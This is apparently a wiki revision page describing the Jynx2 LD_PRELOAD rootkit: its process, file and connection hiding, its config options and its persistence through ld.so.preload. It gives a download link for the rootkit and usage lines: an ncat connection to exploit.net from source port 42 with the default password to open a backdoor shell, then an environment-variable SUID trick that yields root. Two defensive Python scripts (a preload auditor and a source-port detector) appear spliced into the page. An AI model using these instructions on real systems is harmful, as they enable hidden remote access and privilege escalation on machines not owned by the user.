Difference between revisions of "Jynx Rootkit/2.0"
Diff of the section MULTI-FACTOR AUTHENTICATION, line 75 in both revisions. The CONFIG_FILE paragraph above the heading, the heading itself, and the HIGH_PORT/LOW_PORT and SHELL_PASSWORD paragraphs below it are unchanged context and are repeated in the rendered revision below. The one changed line is the notice box:

− (old): {{notice|'''<i>Jynx2 uses two-factor [[authentication credentials|authentication]]. </i>'''{{code|text=With Jynx2, the MAGIC_ACK/MAGIC_SEQ port-knocking authentication method was deprecated in

+ (new): {{notice|'''<i>Jynx2 uses two-factor [[authentication credentials|authentication]]. </i>'''{{code|text=With Jynx2, the MAGIC_ACK/MAGIC_SEQ port-knocking authentication method was deprecated in favor of HIGH_PORT, LOW_PORT, and an accept() hook. This means that Jynx2 can backdoor any existing listening service without interrupting normal user interactivity for that service.}}}}
Revision as of 03:26, 17 March 2012
Jynx2 is an expansion of the original Jynx LD_PRELOAD rootkit, written in C, with several modifications: multi-factor authentication, a more compatible shell drop, and additional hiding features.
It is a crime to use techniques or tools on this page against any system without written authorization unless the system in question belongs to you.
Features
- Hiding from netstat
- Hiding from ps/top and /proc
- File hiding
- SSL connect accept() hook
- Multi-factor authentication
- Improved anti-removal features
- SUID Drop-shell with environment variable
Archive Contents
[root@ares jynx2]# ls
Makefile  README  config.h  jynx2.c  packer.sh  reality.c
In this rendition of Jynx, the installation process builds two shared libraries. One, jynx2.so, is the rootkit itself; the other, reality.so, lets the remote-access user see their own (otherwise hidden) files and processes.
Configuration Options in config.h
Improper configuration of Jynx2 can result in severe system instability, including segmentation faults of nearly every process on the infected host.
MAGIC_STRING
- MAGIC_STRING is the name of the directory, directly under the top-level directory /, that Jynx2 installs to. By default this directory is hidden from the root user via the magic UID and GID. If MAGIC_STRING is set to "hiddendir", Jynx2 installs to (and hides) the folder "/hiddendir". The string can also be used as a prefix for any other file or process the user wishes to hide; it is not limited to Jynx2's installation directory.
MAGIC_GID and MAGIC_UID
- Similar to the original Jynx Rootkit, Jynx2 will automatically hide processes, files, and connections owned by the magic UID or GID.
REALITY_PATH
This is the path where reality.so will be copied to. By default, Jynx2 will install this into /XxJynx/reality.so.
CONFIG_FILE
The CONFIG_FILE defaults to ld.so.preload, which is commonly located in the /etc directory. Alternatively, services can be backdoored by setting the LD_PRELOAD environment variable if overwriting /etc/ld.so.preload is unfavorable.
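Because ld.so.preload is the persistence point described above, a defender's first check is the content of that file. The following audit is an added example, not code from the Jynx2 project: it parses an ld.so.preload file the way glibc's loader does (whitespace-separated entries, '#' comments) and reports entries that are not on an allowlist, live outside the usual library directories, or are missing on disk. The allowlist, the standard-directory list and the sample file content are constructed; the `exists` callback is injectable so the check can be pointed at a filesystem image mounted from a clean boot rather than trusting the live host.

```python
import os

# Directories where system libraries normally live (constructed baseline for
# the example; extend it for your own distribution).
STANDARD_LIB_DIRS = ("/lib", "/lib64", "/usr/lib", "/usr/lib64", "/usr/local/lib")

# Libraries this host is expected to preload (constructed allowlist).
ALLOWED = {"/usr/lib/libjemalloc.so.2"}


def parse_preload(text):
    """Return the shared-object paths listed in an ld.so.preload file.

    glibc's loader splits the file on whitespace and ignores text after '#'.
    """
    libs = []
    for line in text.splitlines():
        libs.extend(line.split("#", 1)[0].split())
    return libs


def audit_preload(text, allowed=ALLOWED, exists=os.path.exists):
    """Map each non-allowlisted entry to the reasons it looks suspicious.

    `exists` is injectable so the check can run against a mounted image
    (e.g. lambda p: os.path.exists("/mnt/image" + p)) or fully offline.
    """
    findings = {}
    for lib in parse_preload(text):
        if lib in allowed:
            continue
        reasons = ["not in allowlist"]
        if not any(lib.startswith(d + "/") for d in STANDARD_LIB_DIRS):
            reasons.append("outside standard library directories")
        if not exists(lib):
            reasons.append("not present on disk")
        findings[lib] = reasons
    return findings


# Constructed ld.so.preload content; the /XxJynx path mirrors the page's
# default MAGIC_STRING directory and is not a real indicator.
SAMPLE = """# constructed sample
/usr/lib/libjemalloc.so.2
/XxJynx/jynx2.so
/opt/missing.so
"""

if __name__ == "__main__":
    present = {"/usr/lib/libjemalloc.so.2", "/XxJynx/jynx2.so"}  # constructed
    for lib, reasons in audit_preload(SAMPLE, exists=present.__contains__).items():
        print(f"{lib}: {', '.join(reasons)}")
```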
MULTI-FACTOR AUTHENTICATION
With Jynx2, the MAGIC_ACK/MAGIC_SEQ port-knocking authentication method was deprecated in favor of HIGH_PORT, LOW_PORT, and an accept() hook. This means that Jynx2 can backdoor any existing listening service without interrupting normal user interactivity for that service.
The first factor is the LOW_PORT/HIGH_PORT range, which defaults to 41 and 43 respectively. The source port of a client connection must fall within this range to activate Jynx2's accept() hook. Because these are low-numbered ports normally used only as service (listening) ports, it is rare for any connection to originate from them by chance. The second factor is SHELL_PASSWORD. It must be the first line sent to the backdoor after connecting; it defaults to "DEFAULT_PASS" and should be changed before compilation.
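The source-port trigger is exactly what makes this hook observable from outside the host: the client's source port is visible to a firewall log, a flow collector or a span port, none of which the rootkit can hook. The script below is an added example, not code from the Jynx2 project; it parses a constructed connection-log format, flags connections whose client source port falls in the page's default 41 to 43 range (the bounds are parameters, so it also covers any other configured range or the whole privileged range below 1024), and groups hits by the service that received them. Addresses in the sample are RFC 5737 documentation addresses.

```python
import re
from collections import defaultdict, namedtuple

Conn = namedtuple("Conn", "src_ip src_port dst_ip dst_port")

# Constructed record format used by this example:
#   <timestamp> TCP <client ip>:<client port> -> <server ip>:<server port>
LINE_RE = re.compile(r"\bTCP (\S+):(\d+) -> (\S+):(\d+)")


def parse_line(line):
    """Return a Conn for a well-formed record, or None for anything else."""
    m = LINE_RE.search(line)
    if not m:
        return None
    return Conn(m.group(1), int(m.group(2)), m.group(3), int(m.group(4)))


def find_trigger_connections(lines, low=41, high=43):
    """Return connections whose client source port lies in [low, high].

    Defaults are the page's LOW_PORT/HIGH_PORT. Ordinary clients take source
    ports from the OS ephemeral range (Linux default: 32768-60999), and binding
    a port below 1024 needs root or CAP_NET_BIND_SERVICE on the client, so even
    a single hit deserves a look at the destination service.
    """
    return [c for c in map(parse_line, lines) if c and low <= c.src_port <= high]


def services_targeted(conns):
    """Group hits by destination service: (dst_ip, dst_port) -> sorted client IPs."""
    by_service = defaultdict(set)
    for c in conns:
        by_service[(c.dst_ip, c.dst_port)].add(c.src_ip)
    return {svc: sorted(ips) for svc, ips in by_service.items()}


# Constructed log lines (documentation addresses, RFC 5737).
SAMPLE_LOG = [
    "2012-03-17T03:26:01Z TCP 198.51.100.7:42 -> 192.0.2.10:80",
    "2012-03-17T03:26:05Z TCP 198.51.100.7:51234 -> 192.0.2.10:80",
    "2012-03-17T03:26:09Z TCP 203.0.113.5:41 -> 192.0.2.10:443",
    "2012-03-17T03:26:12Z TCP 203.0.113.5:43 -> 192.0.2.10:80",
    "2012-03-17T03:26:15Z flow record in another format",
]

if __name__ == "__main__":
    hits = find_trigger_connections(SAMPLE_LOG)
    for (ip, port), clients in services_targeted(hits).items():
        print(f"{ip}:{port} received low-source-port connections from {clients}")
```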
LIBC_PATH
LIBC_PATH is set in config.h and defines the path to the libc binary. It can be found by running ldd against any common coreutils or binutils binary, for example ldd $(which ls), and reading the libc entry from the output.
ENV_VARIABLE
A new feature in Jynx2 is the ability to drop a local suid shell using an environment variable as defined in the configuration. When this environment variable is set, SUID executables will grant root access to the local machine for privilege escalation by the remote user.
Download & Installation
It is highly recommended that the configuration be changed before compiling or installing Jynx2 on any device.
- Download URL: http://blachatacademy.org/jynx2.tgz
Usage
Once Jynx2 is successfully installed on a target machine, accessing its accept() hook with the default configuration looks like:
[user@host ~]$ sudo ncat exploit.net 80 -p 42 --ssl
DEFAULT_PASS
Bump with shell.
>ls -lia
214473 drwxr-xr-x  2 user users 176 Mar  7 19:19 .
177137 drwxr-xr-x 15 user users 952 Mar  5 22:15 ..
By default, with XxJynx as the ENV_VARIABLE configuration:
>XxJynx=1 gpasswd /
>id
uid=0(root) gid=0(root) groups=0(root),1(bin),2(daemon),3(sys),4(adm),6(disk),10(wheel),19(log)